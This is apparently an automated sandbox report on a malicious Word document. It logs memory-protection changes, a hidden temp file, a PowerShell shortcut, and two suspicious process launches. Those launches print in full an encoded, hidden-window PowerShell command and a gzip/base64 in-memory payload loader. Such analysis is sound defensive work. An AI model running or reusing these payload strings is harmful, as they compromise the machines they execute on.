NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6aa61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6aab5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6aa51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6aa21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e201000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e202000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02232000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0225a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02233000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02267000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02252000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02265000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02235000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0225c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02236000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02253000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02254000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02255000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02256000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02257000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02258000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02259000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2022, 12:30 p.m.	process_identifier: 2976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Aug. 1, 2022, 12:30 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000198 filepath: C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

cmdline

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Word document hooks document open

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
